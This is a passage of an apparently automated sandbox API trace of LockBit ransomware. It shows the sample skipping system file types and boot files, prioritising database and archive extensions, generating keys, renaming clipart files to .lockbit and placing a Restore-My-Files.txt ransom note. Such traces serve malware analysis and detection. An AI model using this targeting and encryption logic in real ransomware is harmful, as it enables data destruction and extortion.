cAlternateFileName="")) returned 1 [0124.575] lstrcmpiW (lpString1=".", lpString2="J0099200.GIF") returned -1 [0124.576] lstrcmpiW (lpString1="..", lpString2="J0099200.GIF") returned -1 [0124.576] PathFindExtensionW (pszPath="J0099200.GIF") returned=".GIF" [0124.576] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.576] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.576] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.577] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.577] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.577] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.577] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.577] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099200.GIF") returned 1 [0124.577] lstrcmpiW (lpString1="ntldr", lpString2="J0099200.GIF") returned 1 [0124.577] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099200.GIF") returned 1 [0124.577] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099200.GIF") returned -1 [0124.578] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099200.GIF") returned -1 [0124.578] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099200.GIF") returned 1 [0124.578] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099200.GIF") returned -1 [0124.578] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.578] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned=".GIF" [0124.578] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.578] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.578] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.579] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.579] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.lockbit") returned 72 [0124.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.580] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.580] malloc (_Size=0x40068) returned 0x3df0008 [0124.580] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16543) returned 1 [0124.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.581] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.588] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.588] malloc (_Size=0xa6) returned 0x77d7a8 [0124.588] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.588] free (_Block=0x77d7a8) [0124.588] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.588] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.588] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xc8c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099201.GIF", cAlternateFileName="")) returned 1 [0124.588] lstrcmpiW (lpString1=".", lpString2="J0099201.GIF") returned -1 [0124.588] lstrcmpiW (lpString1="..", lpString2="J0099201.GIF") returned -1 [0124.588] PathFindExtensionW (pszPath="J0099201.GIF") returned=".GIF" [0124.588] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.588] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.588] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.589] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.589] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.590] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099201.GIF") returned 1 [0124.590] lstrcmpiW (lpString1="ntldr", lpString2="J0099201.GIF") returned 1 [0124.590] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099201.GIF") returned 1 [0124.590] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099201.GIF") returned -1 [0124.590] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099201.GIF") returned -1 [0124.590] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099201.GIF") returned 1 [0124.590] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099201.GIF") returned -1 [0124.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.591] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned=".GIF" [0124.591] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.591] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.591] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.592] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.592] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.592] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.592] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.lockbit") returned 72 [0124.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.593] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.593] malloc (_Size=0x40068) returned 0x3df0008 [0124.593] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=51401) returned 1 [0124.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.594] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.600] malloc (_Size=0xa6) returned 0x77d7a8 [0124.600] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.602] free (_Block=0x77d7a8) [0124.602] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.602] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.602] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.603] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1367, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099202.GIF", cAlternateFileName="")) returned 1 [0124.603] lstrcmpiW (lpString1=".", lpString2="J0099202.GIF") returned -1 [0124.603] lstrcmpiW (lpString1="..", lpString2="J0099202.GIF") returned -1 [0124.603] PathFindExtensionW (pszPath="J0099202.GIF") returned=".GIF" [0124.603] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.603] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.603] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.604] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.604] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.604] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.604] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.604] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.604] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.605] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.605] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099202.GIF") returned 1 [0124.605] lstrcmpiW (lpString1="ntldr", lpString2="J0099202.GIF") returned 1 [0124.605] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099202.GIF") returned 1 [0124.605] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099202.GIF") returned -1 [0124.605] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099202.GIF") returned -1 [0124.605] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099202.GIF") returned 1 [0124.605] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099202.GIF") returned -1 [0124.605] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.605] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned=".GIF" [0124.605] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.605] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.605] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.605] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.605] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.606] lstrcmpiW (lpString1=".tmd", 